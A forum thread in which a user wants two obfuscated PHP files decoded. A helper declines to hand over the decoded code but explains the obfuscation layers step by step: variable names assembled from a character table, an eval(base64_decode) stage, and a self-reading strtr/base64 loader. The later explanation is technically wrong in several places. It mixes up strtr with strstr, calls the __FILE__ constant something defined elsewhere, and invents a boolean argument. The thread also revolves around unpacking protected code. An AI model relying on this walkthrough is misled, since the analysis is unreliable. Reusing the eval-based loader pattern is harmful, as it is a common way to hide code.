Buying Need some one to decode two small php files

Hi guys as the title says, need some one to decode two small encrypted php files easy job, leave prices please

 

How are they encoded ? Zend, eAccelerator, IonCube ?

 

To be honest i dont know, this is a part of one of them:

$OOO0O0O00=__FILE__;$OO00O0000=0xaf9c;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU4NCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4M2E0KSwnbWJSZi9ENWN1QW5HaVBXK0Uxd294YUtzZUxsdjRYWk9VMmpZcTdOQ3JIVDZCcHRRa2hJU3l6OVYzZ0ZkSjBNOD0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsv

 

Can you give us the full file in [code-] [-/code] block ?

 

I will pm you the code

 

Ok so, I will NOT send you the decoded file since the reverse engineering is strictly prohibited but I will though give you some tips (can't even understand the whole file if i dont have the rest);

$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');
Actually means : $OOO000000='fg6sbehpra4co_tnd';

$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};
$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};
$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
$OOO0O0O00=__FILE__;
$OO00O0000=0xaf9c;

If you take a look at the code, it has just been minified so, take it step by step:
1. $GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
- Means $GLOBALS['OOO0000O0'] = 'base64_d'; (remember $var{4} extracts the char number 4)

2. $GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};
- Means 'base64_d' .= 'ecode' which results into $GLOBALS['OOO0000O0'] = 'bas64_decode';

3. $GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};
- Means $GLOBALS['OOO000O00'] = 'fopen';

4. $GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};
- Means $GLOBALS['O0O000O00'] = 'fget';

5. $GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};
- Means $GLOBALS['O0O000O00'] = 'fgets';

6. $GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
- Means $GLOBALS['O0O00OO00'] = 'fread';

7. $GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};
- Means $GLOBALS['OOO00000O']= 'strtr';

8. $OOO0O0O00=__FILE__;
- __FILE__ is a constant probably defined somewhere in other file, I don't have the whole script so I can't tell which file is it.

9. $OO00O0000=0xaf9c;
- 0xaf9c (hexadecimal) equals 44956 in decimal

Okay so you got all the variables figured out, now you must focus on the next code:

eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU4NCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4M2E0KSwnbWJSZi9ENWN1QW5HaVBXK0Uxd294YUtzZUxsdjRYWk9VMmpZcTdOQ3JIVDZCcHRRa2hJU3l6OVYzZ0ZkSjBNOD0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));
return;

Which is quite easy, considering the fact that you already know what $GLOBALS['OOO0000O0'] means ('base64_decode') just replace it and you will have:
eval(base64_decode('JE8w....')); return;

Now, you obviosly go and decode that string in bas64 and you get: 
$O000O0O00=$GLOBALS['OOO000O00']($OOO0O0O00,'rb');
$GLOBALS['O0O00OO00']($O000O0O00,0x584);
$OO00O00O0=$GLOBALS['OOO0000O0']($GLOBALS['OOO00000O']($GLOBALS['O0O00OO00']($O000O0O00,0x3a4),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));
eval($OO00O00O0);

Again, you already know all the variables, meanwhile the script is creating $O000O0O00 as a string, it calls eval($O000O0O00) at the end so PHP will interpret the text as PHP code. Now we try and replace the variables that we already know and we get:

$O000O0O00 = fopen(__FILE__,'rb');
fread($O000O0O00,0x584);
$OO00O00O0 = base64_decode(strtr(fread($handle,0x3a4),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));

* we dont need eval anymore because we already written the code in PHP.

Not knowing the $O000O0O00's name because it's just the handle of the __FILE__ we'll just use $handle. Seeing that we have some hexadecimal numbers, we'll try and figure out what they are usefull at.

So we have: 
$handle = fopen(__FILE__,'rb');
fread($handle,1412); // 0x584 in decimal equals 1412
$OO00O00O0=base64_decode(strtr(fread($handle,932),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')); //because 0x3a4 is 932 in decimal

The next and the only one available is to replace fread. Knowing that we already read 1412 bytes from the file, the pointer is at byte 1413. Since we are speaking about a file, we know that files contain characters, and we also know that characters can be single or multi byte. So, the pointer is at 1413, next step, the variable so called $OO00O00O0 gets the value of a string, knowing that strstr returns the first occurence of the needle in the haystack.

So the first parameter of strstr is the content from file __FILE__ starting from byte 1413 to the following 932 bytes. The second parameter and the third parameters are strings. The interesting thing is the third parameter of the strstr in file __FILE__ . Since Base64Decode will NEVER get a string ordonated, this is just set as a TRUE parameter for the strstr function (check php5 documentation).

So we come up with this: 
$handle = fopen(__FILE__,'rb');
fread($handle,1412);
$OO00O00O0=base64_decode(strtr(fread($handle,932),'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=',true));

$OO00O00O0 will be a base64 encoded string which is contained, starting from byte 1412 to the first occurence of 'mbRf/D5cuAnGiPW+E1woxaKseLlv4XZOU2jYq7NCrHT6BptQkhISyz9V3gFdJ0M8=' without including the needle (since we have true as a third before_needele param).

This is the end of our journey, since we cannot go any further without having the possibility to study your __FILE__ constant (which is by the way opened for reading in binary mode, that lets us know it's another bas64_encode string)

Code (markup):

 

Thanks alot i will try but looks Hard

 

It looks that way because it's a lot of scrambled php code . It's meant to look this way, but this is very simple and logic, going backwards. If it would be scrambled without logics, PHP itself wouldn't know how to manage the code, but he manages the code as I've explained earlier . You need to find that __FILE__ and echo the base64_decode from the strstr (fread(a,b),c,d);

If you could send me a PM with all the files, I could take a deeper look.